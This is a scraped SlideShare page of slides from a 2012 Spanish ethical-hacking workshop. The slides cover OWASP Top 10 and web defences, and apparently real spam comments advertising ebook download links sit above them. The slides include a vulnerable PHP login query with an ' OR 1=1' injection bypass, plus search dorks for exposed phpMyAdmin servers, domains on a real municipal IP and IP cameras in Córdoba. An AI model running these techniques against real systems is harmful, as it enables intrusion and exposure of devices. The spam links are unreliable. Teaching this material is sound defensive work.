Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Taller Hacking Ético #Sysmana2012

90,056 views

Published on

Representantes de la empresa cordobesa "Proxy Consulting" (Miguel Ángel Arroyo y Carlos García) nos ofrecen un instructivo e intesantísimo taller sobre hacking ético.

IES Gran Capitán. Sysmana04.

Published in: Technology
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (Unlimited) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { http://shorturl.at/krvUW } ......................................................................................................................... Download Full EPUB Ebook here { http://shorturl.at/krvUW } ......................................................................................................................... Download Full doc Ebook here { http://shorturl.at/krvUW } ......................................................................................................................... Download PDF EBOOK here { http://shorturl.at/krvUW } ......................................................................................................................... Download EPUB Ebook here { http://shorturl.at/krvUW } ......................................................................................................................... Download doc Ebook here { http://shorturl.at/krvUW } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • ACCESS that WEBSITE Over for All Ebooks (Unlimited) ......................................................................................................................... DOWNLOAD FULL PDF EBOOK here { http://bit.ly/2m77EgH } ......................................................................................................................... DOWNLOAD FULL EPUB Ebook here { http://bit.ly/2m77EgH } ......................................................................................................................... Download Full PDF EBOOK here { http://bit.ly/2m77EgH } ......................................................................................................................... Download EPUB Ebook here { http://bit.ly/2m77EgH }
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

Taller Hacking Ético #Sysmana2012

  1. 1. Miguel Á. Arroyo Moreno Carlos García García @PxyConsulting @ciyinetwww.proxyconsulting.es
  2. 2. Índice Presentación Hacking Ético WebHacking Ético Externo www.proxyconsulting.es
  3. 3. Presentación Consultoría cordobesa especializada en seguridad de la información Desde 2006 www.proxyconsulting.es Blog: www.hacking-etico.com www.proxyconsulting.es
  4. 4. Algunos de nuestros servicios: Hacking Ético Externo Seguridad Perimetral Hacking Ético Web Aula Segura Oficina Segura www.proxyconsulting.es
  5. 5. Carlos García García @ciyinetwww.proxyconsulting.es
  6. 6. Índice – Hacking Ético Web OWASP  OWASP Top 10 Demostración ataques  Inyección SQL  Cross Site Scripting  Manipulación cabeceras HTTP y POST  Robo de credenciales* Aplicación web segura  Programación segura  WAF www.proxyconsulting.es
  7. 7. OWASP Open Web Application Security Project (2001) Determinar y combatir las causas que hacen que el software sea inseguro Fundación (2004) / Comunidad Documentos Herramientas www.owasp.org www.proxyconsulting.es
  8. 8. OWASP Top 10 “Los diez riesgos más importantes en Aplicaciones Web” Documento educativo. De cada riesgo:  Descripción del mismo  Escenario de ejemplo  Cómo verificar si nuestra aplicación es vulnerable  Recomendaciones para prevenirlo Gratuito www.proxyconsulting.es
  9. 9. www.proxyconsulting.es
  10. 10. OWASP Top 10 www.proxyconsulting.es
  11. 11. OWASP Top 10 www.proxyconsulting.es
  12. 12. Demostración de ataques SQLi XSS Manipulación datos HTTP Robo de credenciales* www.proxyconsulting.es
  13. 13. Inyección SQL Incluir comandos mal intencionados en los datos de una aplicación los cuales son enviados a un interprete El intérprete toma estos datos y los ejecuta como válidos: código SQL Impacto Severo  Pérdida o corrupción de datos  Negación de acceso  Toma de posesión completa del servidor www.proxyconsulting.es
  14. 14. Inyección SQL"SELECT * FROM usuario WHEREemail=".$_POST[log]."ANDpassword=".$_POST[pwd].""; www.proxyconsulting.es
  15. 15. Inyección SQL"SELECT * FROM usuario WHEREemail=".$_POST[log]."ANDpassword=".$_POST[pwd]."";"SELECT * FROM usuario WHERE email=i52gagac@uco.esANDpassword=password"; www.proxyconsulting.es
  16. 16. Inyección SQL"SELECT * FROM usuario WHEREemail=".$_POST[log]."ANDpassword=".$_POST[pwd]."";Usuario: OR 1=1Password: OR 1=1 www.proxyconsulting.es
  17. 17. Inyección SQL"SELECT * FROM usuario WHEREemail=".$_POST[log]."ANDpassword=".$_POST[pwd]."";Usuario: OR 1=1Password: OR 1=1 www.proxyconsulting.es
  18. 18. Inyección SQL"SELECT * FROM usuario WHEREemail=". OR 1=1."ANDpassword=". OR 1=1."";Usuario: OR 1=1Password: OR 1=1 www.proxyconsulting.es
  19. 19. Inyección SQL"SELECT * FROM usuario WHEREemail= OR 1=1ANDpassword= OR 1=1";Sentencia correcta y verdadera www.proxyconsulting.es
  20. 20. Cross Site Scripting (XSS) Datos no validados de un atacante son enviados al navegador de una víctima Estos datos pueden estar:  Encontrarse almacenados en una base de datos  Ser reflejados desde una entrada web Impacto moderado:  Robo de sesión  Robar datos sensibles  Redireccionar usuario hacia sitio de malware o phising www.proxyconsulting.es
  21. 21. Manipulación cabeceras HTTP Testear aplicaciones modificando parámetros POST Validación en lado del cliente en lugar del servidor www.proxyconsulting.es
  22. 22. Aplicación web segura Seguridad debe estar presente en todas las fases del proyecto Diseño y programación segura Auditoría de seguridad WAF www.proxyconsulting.es
  23. 23. Programación segura Buenas prácticas a la hora de programar: OWASP Top 10 Sanitizar previamente entradas del usuario  OWASP Enterprise Security API  OWASP AntiSamy Project Mínimo privilegio en las conexiones a base de datos Validar referencias directas a objetos www.proxyconsulting.es
  24. 24. OWASP Enterprise Security API API con objetos y métodos que permiten validaciones y controles eficientes.  Evitar vulnerabilidades comunes Versiones para la mayoría de lenguajes de programación web:  ASP.NET, Java, PHP, ColdFusion, Javascript, Ruby, Pytho, etc. www.proxyconsulting.es
  25. 25. OWASP Enterprise Security API www.proxyconsulting.es
  26. 26. ESAPI – Manejo de validación y Codificación www.proxyconsulting.es
  27. 27. WAF Entradas -> Código en servidor Sanitizar todas las entradas -> Costoso modSecurity:  Plugin para servidor  Sólo disponible en Apache PHPIDS:  IDS para aplicaciones PHP  Reglas  Libertad toma decisiones www.proxyconsulting.es
  28. 28. PHPIDS Utilización de IDS Web: PHPIDS Paso por PHPIDS de peticiones:  SESSION  POST  GET  COOKIE Detecta XSS, SQLi, RFE, LFI, DoS, LDAP, etc. Medidas planteadas:  Si existe grado de amenaza: redirección a web con aviso  Si no existen amenaza: continuar script PHP Demostración www.proxyconsulting.es
  29. 29. Miguel Á. Arroyo Moreno @PxyConsultingwww.proxyconsulting.es
  30. 30. Índice – Hacking Ético Externo Hacking Ético Search Engine Hacking  Google Hacking  Bing Hacking  Shodan Hacking Metasploit & Metasploitable www.proxyconsulting.es
  31. 31. Índice Buscadores como herramienta para Pentesters  Direcciones de correo  Archivos y carpetas con información sensible  Metadatos (Foca online)  Usuarios y contraseñas Search Engine Hacking  Google  Bing  Shodan www.proxyconsulting.es
  32. 32. Buscadores como herramienta Herramienta de gran utilidad para la fase de obtención de información. Se trata de un proceso pasivo y poco intrusivo.  Pasivo porque no existe comunicación directa con el objetivo (posibilidad de usar versiones cacheadas).  Poco intrusivo porque no hay consecuencias directas tras la búsqueda. Obtenemos direcciones de correo electrónico, archivos, metadatos, usuarios y contraseñas. www.proxyconsulting.es
  33. 33. SEH con Google Google indexa todo lo que hay en la red, salvo aquello que nosotros no “queremos” que se indexe, robots.txt. Potentes comandos de búsqueda muy útiles para el Hacking Ético. Uso de versiones cacheadas para mantener la pasividad. Ruido documental; cómo reducirlo. www.proxyconsulting.es
  34. 34. SEH con Google – robots.txt www.proxyconsulting.es
  35. 35. SEH con Google – Errores www.proxyconsulting.es
  36. 36. SEH con Google - MySQL Una de las búsquedas más usadas es la de localizar servidores MySQL. Es bastante sencillo sabiendo usar las frases claves apropiadas, y reduciendo el ruido documental.  “welcome to phpmyadmin” “your mysql server is running” –”not allowed” Contramedida: evitar indexación del directorio /phpmyadmin con la cláusula disallow en nuestro fichero robots.txt. Más información en www.hacking-etico.com. www.proxyconsulting.es
  37. 37. SEH con Bing – Direcciones correo Bing tiene ciertos comandos que Google no tiene, por ejemplo el comando near. Nos puede venir muy bien para encontrar direcciones de correo electrónico. Los resultados de búsqueda varían cuando se usa el comando near para buscar direcciones: correo near:3 ayuncordoba.es. Conseguimos mejor resultados. www.proxyconsulting.es
  38. 38. SEH con Bing – Direcciones correo www.proxyconsulting.es
  39. 39. SEH con Bing – Dominios por IP Otro comando muy interesante es el comando ip, que nos muestra todos los dominios que apuntan a una determinada ip. Nos puede ayudar a encontrar nuevos dominios y subdominios que apuntan a dicha ip, ¿virtualhosts? Con los resultados podemos ampliar el scope (alcance) de la auditoría. Ejemplo con ayuncordoba.es (195.57.42.107). Aparecen nuevos dominios y subdominios. www.proxyconsulting.es
  40. 40. SEH con Bing – Dominios por IP www.proxyconsulting.es
  41. 41. SEH con Shodan – Recursos Buscador orientado a buscar otros recursos en Internet que no son documentos; routers, puntos de acceso, servidores, cámaras ip… Herramienta realmente interesante desde el punto de vista del pentester. Servicio gratuito pero limitado. Registro gratuito aumenta resultados de búsqueda y filtros (net, port, country, city, geo...). Opción de pago. Por ejemplo, podemos buscar dispositivos con snmp. www.proxyconsulting.es
  42. 42. SEH con Shodan – snmp www.proxyconsulting.es
  43. 43. SEH con Shodan – Geo y cámaras IP Shodan cuenta con unos filtros muy interesantes que son country y city. Éste último sólo funciona con ciudades grandes, por ejemplo, con Córdoba no funciona. Pero tenemos el filtro geo… Podemos usar las coordenadas de Córdoba, en formato decimal, para especificar que se busquen recursos sólo de Córdoba. Usaremos el filtro geo:37.884722,-4.778889. Veamos un ejemplo buscando cámaras IP en Córdoba. www.proxyconsulting.es
  44. 44. SEH con Shodan – Geo y cámaras IP www.proxyconsulting.es
  45. 45. Recuerda Que Google no sólo sirve para buscar documentos o sitios Web. Que hay otros buscadores, como Bing, que nos pueden aportar otros resultados interesantes, que Google no nos da. Que Shodan nos permite encontrar recursos hardware, como servidores, routers, impresoras… Y que uséis lo aprendido aquí de forma ética y legal. www.proxyconsulting.es
  46. 46. Referencias http://www.slideshare.net/fcerullo/owasp-top10- spanish http://www.jtmelton.com/2009/01/03/the-owasp- top-ten-and-esapi/ www.proxyconsulting.es
  47. 47. GRACIASMiguel Á. Arroyo Moreno Carlos García García @PxyConsulting @ciyinet

×